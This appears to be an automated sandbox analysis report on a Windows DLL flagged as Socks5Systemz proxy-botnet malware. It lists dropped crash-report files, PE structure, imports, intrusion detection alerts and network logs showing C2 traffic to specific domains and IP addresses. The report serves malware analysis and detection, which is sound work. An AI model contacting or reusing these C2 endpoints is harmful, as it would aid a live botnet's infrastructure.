                            SHA-512:F7CE695553CB60A8BB7AE8FE87651F459A67F089B2F2DE2B96F8C0104903DE030E5B852A59BBB35F1AD46AFE6A74FE1786950FE9C560E376B5F3A626E0C493E5
                            Malicious:false
                            Reputation:low
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.6.9.3.6.3.8.0.7.0.2.1.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.6.9.3.6.3.8.4.9.2.0.9.5.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.4.e.c.a.6.b.d.-.f.2.e.7.-.4.0.a.2.-.8.1.8.a.-.3.b.d.e.4.9.c.1.0.1.4.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.b.6.3.9.a.a.7.-.b.1.9.4.-.4.a.9.2.-.8.f.8.d.-.6.a.1.c.f.b.f.f.0.b.b.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.e.4.-.0.0.0.1.-.0.0.1.4.-.7.5.8.e.-.3.7.8.2.8.2.4.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):8318
                            Entropy (8bit):3.6941783268308765
                            Encrypted:false
                            SSDEEP:192:R6l7wVeJrC6d46YPZ6JkgmfTcJJzpr+89br+sfCS5m:R6lXJ+6d46YR66gmfTcJJpr9fE
                            MD5:10507B46A524A8B9128E71AA468005C8
                            SHA1:A1E2EEB42D3AD57A48DE6E838D67F747C7897BB1
                            SHA-256:9D0ECF398CE1555F3E2A00CAFAA4CC6F86997CF532B4BCE94356155689D1AF38
                            SHA-512:E0DA4E0F6B37ADA7E67BF24A3FAE72D05B68B1BC495E898D3814BA1107B1FA2E8BCE36B372AEF0F36F514BC86A8EB1DB25D3D49C7E56FF4055AE459F8311521E
                            Malicious:false
                            Reputation:low
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.5.2.<./.P.i.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4706
                            Entropy (8bit):4.508357442357936
                            Encrypted:false
                            SSDEEP:48:cvIwWl8zs1Jg77aI9epWpW8VYuYm8M4JCdPEiFX+q8/evFHHGScS/d:uIjfPI7UY7VKJCPHJ3/d
                            MD5:880504E4826CBE73A8274EA23E48366A
                            SHA1:36B523C16E5136DA07F5734A4159FE103A7D521B
                            SHA-256:13AA4C86C06277D746097C346F3BD1D90C660D6B135320CD0DC3F0A420939C74
                            SHA-512:C0DCD03EE9A6F11A52AC62D13FF55D179C32F2B88D0E804B8BEB1FEB469048D41EB02683A2D7956389122EB43AF9A2A5CF0661125FB595D1FB3ADC93DE3B834D
                            Malicious:false
                            Reputation:low
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="631609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Mini DuMP crash report, 14 streams, Sat Dec 14 23:47:18 2024, 0x1205a4 type
                            Category:dropped
                            Size (bytes):57266
                            Entropy (8bit):2.1580569346960994
                            Encrypted:false
                            SSDEEP:192:colh6ONziHp36bO5H4gOoVubtQV8qYrGDyBG4lvCY7kbA6NAgTgSJv5:l6KziHp36i5H9RUaKBnG4MY7kk6ZggB
                            MD5:162083EDD928EE9F66BC014CD73BD97B
                            SHA1:A185AD32F8E32599CB0362A93EBDFA15EDC0E0C4
                            SHA-256:51ABDA0F2BD40905A16C6E71D7D92E978E50A98C95D3BB6120C98558CEDB1CBF
                            SHA-512:C083658E00FCF5EC2B36E5C00DB8CF1C32E3832107C2087BEEA5968245123068133D3C72D29ED8961ABE80607C45FFB3BE6DCC2796BDCA91BC8B8DE7578D334C
                            Malicious:false
                            Reputation:low
                            Preview:MDMP..a..... .........^g....................................4....3..........T.......8...........T...........`#..R...........T...........@...............................................................................eJ..............GenuineIntel............T.............^g.............................0..=...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\loaddll32.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):4
                            Entropy (8bit):0.8112781244591328
                            Encrypted:false
                            SSDEEP:3:M:M
                            MD5:4352D88A78AA39750BF70CD6F27BCAA5
                            SHA1:3C585604E87F855973731FEA83E21FAB9392D2FC
                            SHA-256:67ABDD721024F0FF4E0B3F4C2FC13BC5BAD42D0B7851D456D88D203D15AAA450
                            SHA-512:EDF92E3D4F80FC47D948EA2F17B9BFC742D34E2E785A7A4927F3E261E8BD9D400B648BFF2123B8396D24FB28F5869979E08D58B4B5D156E640344A2C0A54675D
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:....
                            Process:C:\Windows\SysWOW64\rundll32.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):3.7676871649903405
                            Encrypted:false
                            SSDEEP:3:rFAE31H9WGGLdDrC3pkHW:rFllUNBm3pkHW
                            MD5:259056BBC767F630B6B067ED5D73E1A9
                            SHA1:B6CD12A34A9F98D15F2E4C62B8D2BC9C59750ED0
                            SHA-256:84D5A998635571430B2F71DE3A65B6BB9DBF40E2A7925EE3D7152F9818F8199D
                            SHA-512:3AC44FA4BD5F82FFBE46A89F9A6DEDB00537AABD6AD021F64A1DC32058548CB00E74CB111E9611D72019CFC79430220F5BD5072B0DBB6717DE59D15DF4355EFA
                            Malicious:false
                            Preview:fe0670bf22e56efef3dcb9c43e7a2b8f662f3ccf28f6a30e537a9ba072d59a73
                            Process:C:\Windows\SysWOW64\rundll32.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):8
                            Entropy (8bit):2.0
                            Encrypted:false
                            SSDEEP:3:lmtn:li
                            MD5:CFAB2BABE03C15399B136DE70E1EB294
                            SHA1:0C7F47FFEDB5A9F172EF1380B3307D66340B3C95
                            SHA-256:061A3D3D1D5AE8AA0D86E03772C838008675E64D6EC494AC787FE2E0A1D215F7
                            SHA-512:6BFA7355A6DCD75ED9746E161F531C173421FDC5454F3E528415BF9472BE093862211B3DB7EE8862086711D0AC4F54E02651B0951821FECCFE96E7C96395C490
                            Malicious:false
                            Preview:..^g....
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.466233813774183
                            Encrypted:false
                            SSDEEP:6144:FIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNxdwBCswSbG:mXD94+WlLZMM6YFHT+G
                            MD5:FD132835EC2055620F4A6567681C1D60
                            SHA1:33CC1BA1606417A47B2C1B27A5AEE0727CA508B4
                            SHA-256:B5B318159728822F4EABA5B04EE17E5E1FB5EF62F22AD334A105E65FAD66473B
                            SHA-512:9921D132CD23574F6D044140565693F777C92832F80C93AD88C1667BC3820347C67CF4C14DE0EA009C40760385DD7E55BA9B67A559325C45BA640F3A10AC9CE3
                            Malicious:false
                            Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..{..N................................................................................................................................................................................................................................................................................................................................................l.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.592930684908829
                            TrID:
                            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                            • Generic Win/DOS Executable (2004/3) 0.20%
                            • DOS Executable Generic (2002/1) 0.20%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:cNF6fXdjPw.dll
                            File size:676'387 bytes
                            MD5:76436512e3e3a9dca38f5eaf312fe323
                            SHA1:503af6ad7617f847abbe509a907944f0e9213505
                            SHA256:7d4ea4e69143df3f0f8fb9e4dee13c5251c4b1810d6b3a8626195906f00c0a49
                            SHA512:aab595de7a3af9a3e7c480f953b392f42965348ffcda6a410eb990ae2c11c5a87f975b2ad2c34a147767b14325c60117af64f2bcea2813a7fbcee94ddfc951d9
                            SSDEEP:12288:oIsMQVdsxSoqFsUzAbRb7aZJhztomX9mFu4Ou1GN3/k3jQlVUihjxWBZlUAxwqwX:nDQVdsxSoqFsGA6rX9mFujeMwQljhjxb
                            TLSH:19E4D121B652A17DC6AF1672481A760752FD7BE04B70DD5BEF8C2D1C8BB74C1B23221A
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D...%...%...%...w...%...w>._%...]?..%...w?..%...]M..%...%..Q%...];..%...w...%...]...%..Rich.%..........PE..L.....be...........
                            Icon Hash:7ae282899bbab082
                            Entrypoint:0x1001c462
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x10000000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                            Time Stamp:0x6562FADC [Sun Nov 26 07:59:24 2023 UTC]
                            TLS Callbacks:0x1001a9a0
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:f0e11ecd3bbee7b4aa223cc34c18cd2a
                            Instruction
                            push ebp
                            mov ebp, esp
                            cmp dword ptr [ebp+0Ch], 01h
                            jne 00007F6DE91DD7E7h
                            call 00007F6DE91E5B26h
                            push dword ptr [ebp+10h]
                            push dword ptr [ebp+0Ch]
                            push dword ptr [ebp+08h]
                            call 00007F6DE91DD7ECh
                            add esp, 0Ch
                            pop ebp
                            retn 000Ch
                            push 0000000Ch
                            push 1003AD78h
                            call 00007F6DE91E2644h
                            xor eax, eax
                            inc eax
                            mov esi, dword ptr [ebp+0Ch]
                            test esi, esi
                            jne 00007F6DE91DD7EEh
                            cmp dword ptr [1004004Ch], esi
                            je 00007F6DE91DD8CAh
                            and dword ptr [ebp-04h], 00000000h
                            cmp esi, 01h
                            je 00007F6DE91DD7E7h
                            cmp esi, 02h
                            jne 00007F6DE91DD817h
                            mov ecx, dword ptr [10031520h]
                            test ecx, ecx
                            je 00007F6DE91DD7EEh
                            push dword ptr [ebp+10h]
                            push esi
                            push dword ptr [ebp+08h]
                            call ecx
                            mov dword ptr [ebp-1Ch], eax
                            test eax, eax
                            je 00007F6DE91DD897h
                            push dword ptr [ebp+10h]
                            push esi
                            push dword ptr [ebp+08h]
                            call 00007F6DE91DD5F6h
                            mov dword ptr [ebp-1Ch], eax
                            test eax, eax
                            je 00007F6DE91DD880h
                            mov ebx, dword ptr [ebp+10h]
                            push ebx
                            push esi
                            push dword ptr [ebp+08h]
                            call 00007F6DE91C9AA1h
                            mov edi, eax
                            mov dword ptr [ebp-1Ch], edi
                            cmp esi, 01h
                            jne 00007F6DE91DD80Ah
                            test edi, edi
                            jne 00007F6DE91DD806h
                            push ebx
                            push eax
                            push dword ptr [ebp+08h]
                            call 00007F6DE91C9A89h
                            push ebx
                            push edi
                            push dword ptr [ebp+08h]
                            call 00007F6DE91DD5BCh
                            mov eax, dword ptr [10031520h]
                            test eax, eax
                            je 00007F6DE91DD7E9h
                            push ebx
                            push edi
                            push dword ptr [ebp+08h]
                            call eax
                            Programming Language:
                            • [ASM] VS2013 build 21005
                            • [ C ] VS2013 build 21005
                            • [C++] VS2013 UPD3 build 30723
                            • [C++] VS2013 build 21005
                            • [IMP] VS2008 SP1 build 30729
                            • [RES] VS2013 build 21005
                            • [LNK] VS2013 UPD3 build 30723
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3b8340x8c.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x440000x1e0.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x450000x3124.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x369f80x18.rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x369b00x40.rdata
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x300000x24c.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x2e4f80x2e6000d6232af30b93c5786da17b063283599False0.4911188089622642data6.518835744837128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x300000xc40e0xc600edc7926f247568444577b89da61e0d0dFalse0.3610124684343434data4.776781540888529IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x3d0000x56bc0x3000257c83e0233e8e4167e1306304b66b32False0.234619140625DOS executable (block device driver)4.836826989273863IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .tls0x430000x20x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0x440000x1e00x200595c0909459d4e76bb3df3fe5dfb1ca0False0.52734375data4.720822661998389IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x450000x31240x3200cb45b4d6dce16e3cc09ca49b9656f3afFalse0.718671875data6.549975712532299IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            .vlizer0x490000x63e000x63c236cd4be77e31019358e268978c34aa901False0.9652285425502495data7.949279852498222IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_MANIFEST0x440600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                            DLLImport
                            WININET.dllInternetCloseHandle, InternetOpenA, InternetSetOptionA, InternetReadFile, InternetOpenUrlA
                            DNSAPI.dllDnsFree, DnsQuery_A
                            KERNEL32.dllHeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, CreateFileA, lstrlenA, TlsGetValue, SetWaitableTimer, InterlockedIncrement, GetQueuedCompletionStatus, InterlockedDecrement, QueryPerformanceCounter, InterlockedCompareExchange, SleepEx, WriteFile, InitializeCriticalSection, TlsSetValue, TerminateThread, InitializeCriticalSectionAndSpinCount, GetTickCount, GetProcessHeap, HeapAlloc, CreateEventA, GetCurrentProcess, HeapFree, WaitForSingleObject, SetEvent, Sleep, GetSystemTimeAsFileTime, LeaveCriticalSection, CreateFileW, lstrcatA, InterlockedExchange, GetLastError, SetLastError, GetProcAddress, QueueUserAPC, EnterCriticalSection, InterlockedExchangeAdd, LocalAlloc, PostQueuedCompletionStatus, WaitForMultipleObjects, GetModuleFileNameA, CreateIoCompletionPort, GetModuleHandleA, lstrcatW, DeleteCriticalSection, GetVersionExA, TlsAlloc, CloseHandle, CreateWaitableTimerA, LocalFree, TlsFree, lstrcpyW, DeleteFileA, CreateThread, FreeLibrary, GetWindowsDirectoryA, LoadLibraryA, DeviceIoControl, GetFileTime, GetStartupInfoW, TerminateProcess, ReadFile, VirtualQuery, GetModuleFileNameW, GetStdHandle, WideCharToMultiByte, SetEndOfFile, FlushFileBuffers, WriteConsoleW, SetStdHandle, HeapReAlloc, AreFileApisANSI, OutputDebugStringW, SetFilePointerEx, LCMapStringW, GetStringTypeW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetFileType, GetConsoleCP, ReadConsoleW, GetConsoleMode, GetModuleHandleW, FormatMessageA, OpenEventA, ReleaseSemaphore, GetCurrentProcessId, GetCurrentThreadId, ResetEvent, ResumeThread, EncodePointer, DecodePointer, ExitThread, LoadLibraryExW, GetCommandLineA, RaiseException, RtlUnwind, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, MultiByteToWideChar, ExitProcess, GetModuleHandleExW
                            USER32.dllwsprintfA
                            SHELL32.dllSHGetSpecialFolderPathW, SHGetSpecialFolderPathA
                            WS2_32.dllioctlsocket, WSAStringToAddressA, connect, inet_ntoa, WSAStartup, ntohl, inet_addr, htonl, getaddrinfo, WSARecv, WSASend, select, WSAGetLastError, htons, ntohs, getsockname, shutdown, setsockopt, freeaddrinfo, WSASetLastError, closesocket, getsockopt, WSASocketA, WSACleanup
                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States
                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-12-15T00:48:27.168072+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44975994.232.249.18780TCP
                            2024-12-15T00:48:27.168072+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44975994.232.249.18780TCP
                            2024-12-15T00:48:40.305084+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44978794.232.249.18780TCP
                            2024-12-15T00:48:40.305084+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44978794.232.249.18780TCP
                            2024-12-15T00:48:40.305084+01002829008ETPRO MALWARE W32/Teamspy Variant Checkin1192.168.2.44978794.232.249.18780TCP
                            2024-12-15T00:48:53.445782+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44981794.232.249.18780TCP
                            2024-12-15T00:48:53.445782+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44981794.232.249.18780TCP
                            2024-12-15T00:49:12.194727+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449874185.237.206.12980TCP
                            2024-12-15T00:49:12.194727+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449874185.237.206.12980TCP
                            2024-12-15T00:49:16.187683+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449874185.237.206.12980TCP
                            2024-12-15T00:49:16.187683+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449874185.237.206.12980TCP
                            2024-12-15T00:50:17.587473+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450013185.237.206.12980TCP
                            2024-12-15T00:50:17.587473+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450013185.237.206.12980TCP
                            TimestampSource PortDest PortSource IPDest IP
                            Dec 15, 2024 00:48:18.891561031 CET4975980192.168.2.494.232.249.187
                            Dec 15, 2024 00:48:19.011368990 CET804975994.232.249.187192.168.2.4
                            Dec 15, 2024 00:48:19.011513948 CET4975980192.168.2.494.232.249.187
                            Dec 15, 2024 00:48:19.011759043 CET4975980192.168.2.494.232.249.187
                            Dec 15, 2024 00:48:19.131433964 CET804975994.232.249.187192.168.2.4
                            Dec 15, 2024 00:48:27.168071985 CET4975980192.168.2.494.232.249.187
                            Dec 15, 2024 00:48:32.180754900 CET4978780192.168.2.494.232.249.187
                            Dec 15, 2024 00:48:32.300793886 CET804978794.232.249.187192.168.2.4
                            Dec 15, 2024 00:48:32.300981998 CET4978780192.168.2.494.232.249.187
                            Dec 15, 2024 00:48:32.301275015 CET4978780192.168.2.494.232.249.187
                            Dec 15, 2024 00:48:32.421298981 CET804978794.232.249.187192.168.2.4
                            Dec 15, 2024 00:48:40.305083990 CET4978780192.168.2.494.232.249.187
                            Dec 15, 2024 00:48:45.321240902 CET4981780192.168.2.494.232.249.187
                            Dec 15, 2024 00:48:45.441042900 CET804981794.232.249.187192.168.2.4
                            Dec 15, 2024 00:48:45.441153049 CET4981780192.168.2.494.232.249.187
                            Dec 15, 2024 00:48:45.441265106 CET4981780192.168.2.494.232.249.187
                            Dec 15, 2024 00:48:45.560966015 CET804981794.232.249.187192.168.2.4
                            Dec 15, 2024 00:48:53.445781946 CET4981780192.168.2.494.232.249.187
                            Dec 15, 2024 00:49:10.761219025 CET4987480192.168.2.4185.237.206.129
                            Dec 15, 2024 00:49:10.881026983 CET8049874185.237.206.129192.168.2.4
                            Dec 15, 2024 00:49:10.881153107 CET4987480192.168.2.4185.237.206.129
                            Dec 15, 2024 00:49:10.881289959 CET4987480192.168.2.4185.237.206.129
                            Dec 15, 2024 00:49:11.001348972 CET8049874185.237.206.129192.168.2.4
                            Dec 15, 2024 00:49:12.194669962 CET8049874185.237.206.129192.168.2.4
                            Dec 15, 2024 00:49:12.194726944 CET4987480192.168.2.4185.237.206.129
                            Dec 15, 2024 00:49:12.196276903 CET498781074192.168.2.445.155.250.225
                            Dec 15, 2024 00:49:12.316220045 CET10744987845.155.250.225192.168.2.4
                            Dec 15, 2024 00:49:12.318295002 CET498781074192.168.2.445.155.250.225
                            Dec 15, 2024 00:49:12.318389893 CET498781074192.168.2.445.155.250.225
                            Dec 15, 2024 00:49:12.438102961 CET10744987845.155.250.225192.168.2.4
                            Dec 15, 2024 00:49:12.438184977 CET498781074192.168.2.445.155.250.225
                            Dec 15, 2024 00:49:12.557929039 CET10744987845.155.250.225192.168.2.4
                            Dec 15, 2024 00:49:13.652512074 CET10744987845.155.250.225192.168.2.4
                            Dec 15, 2024 00:49:13.695626020 CET498781074192.168.2.445.155.250.225
                            Dec 15, 2024 00:49:15.664921999 CET4987480192.168.2.4185.237.206.129
                            Dec 15, 2024 00:49:15.784746885 CET8049874185.237.206.129192.168.2.4
                            Dec 15, 2024 00:49:16.187566042 CET8049874185.237.206.129192.168.2.4
                            Dec 15, 2024 00:49:16.187683105 CET4987480192.168.2.4185.237.206.129
                            Dec 15, 2024 00:49:18.383460999 CET498781074192.168.2.445.155.250.225
                            Dec 15, 2024 00:50:16.196283102 CET4987480192.168.2.4185.237.206.129
                            Dec 15, 2024 00:50:16.196599007 CET5001380192.168.2.4185.237.206.129
                            Dec 15, 2024 00:50:16.316482067 CET8050013185.237.206.129192.168.2.4
                            Dec 15, 2024 00:50:16.316592932 CET5001380192.168.2.4185.237.206.129
                            Dec 15, 2024 00:50:16.316725969 CET8049874185.237.206.129192.168.2.4
                            Dec 15, 2024 00:50:16.316783905 CET5001380192.168.2.4185.237.206.129
                            Dec 15, 2024 00:50:16.316804886 CET4987480192.168.2.4185.237.206.129
                            Dec 15, 2024 00:50:16.436683893 CET8050013185.237.206.129192.168.2.4
                            Dec 15, 2024 00:50:17.587385893 CET8050013185.237.206.129192.168.2.4
                            Dec 15, 2024 00:50:17.587472916 CET5001380192.168.2.4185.237.206.129
                            TimestampSource PortDest PortSource IPDest IP
                            Dec 15, 2024 00:48:18.592104912 CET6055853192.168.2.445.155.250.90
                            Dec 15, 2024 00:48:18.841063023 CET536055845.155.250.90192.168.2.4
                            Dec 15, 2024 00:48:58.462383032 CET5876553192.168.2.481.31.197.8
                            Dec 15, 2024 00:48:59.477250099 CET5876553192.168.2.481.31.197.8
                            Dec 15, 2024 00:49:00.492798090 CET5876553192.168.2.481.31.197.8
                            Dec 15, 2024 00:49:02.493048906 CET5876553192.168.2.481.31.197.8
                            Dec 15, 2024 00:49:06.508526087 CET5876553192.168.2.481.31.197.8
                            Dec 15, 2024 00:49:10.509433985 CET6324853192.168.2.445.155.250.90
                            Dec 15, 2024 00:49:10.759042978 CET536324845.155.250.90192.168.2.4
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Dec 15, 2024 00:48:18.592104912 CET192.168.2.445.155.250.900x2dfeStandard query (0)eeikzox.uaA (IP address)IN (0x0001)false
                            Dec 15, 2024 00:48:58.462383032 CET192.168.2.481.31.197.80xa764Standard query (0)gjeqiox.comA (IP address)IN (0x0001)false
                            Dec 15, 2024 00:48:59.477250099 CET192.168.2.481.31.197.80xa764Standard query (0)gjeqiox.comA (IP address)IN (0x0001)false
                            Dec 15, 2024 00:49:00.492798090 CET192.168.2.481.31.197.80xa764Standard query (0)gjeqiox.comA (IP address)IN (0x0001)false
                            Dec 15, 2024 00:49:02.493048906 CET192.168.2.481.31.197.80xa764Standard query (0)gjeqiox.comA (IP address)IN (0x0001)false
                            Dec 15, 2024 00:49:06.508526087 CET192.168.2.481.31.197.80xa764Standard query (0)gjeqiox.comA (IP address)IN (0x0001)false
                            Dec 15, 2024 00:49:10.509433985 CET192.168.2.445.155.250.900x4288Standard query (0)gjeqiox.comA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Dec 15, 2024 00:48:18.841063023 CET45.155.250.90192.168.2.40x2dfeNo error (0)eeikzox.ua94.232.249.187A (IP address)IN (0x0001)false
                            Dec 15, 2024 00:49:10.759042978 CET45.155.250.90192.168.2.40x4288No error (0)gjeqiox.com185.237.206.129A (IP address)IN (0x0001)false
                            • eeikzox.ua
                            • gjeqiox.com
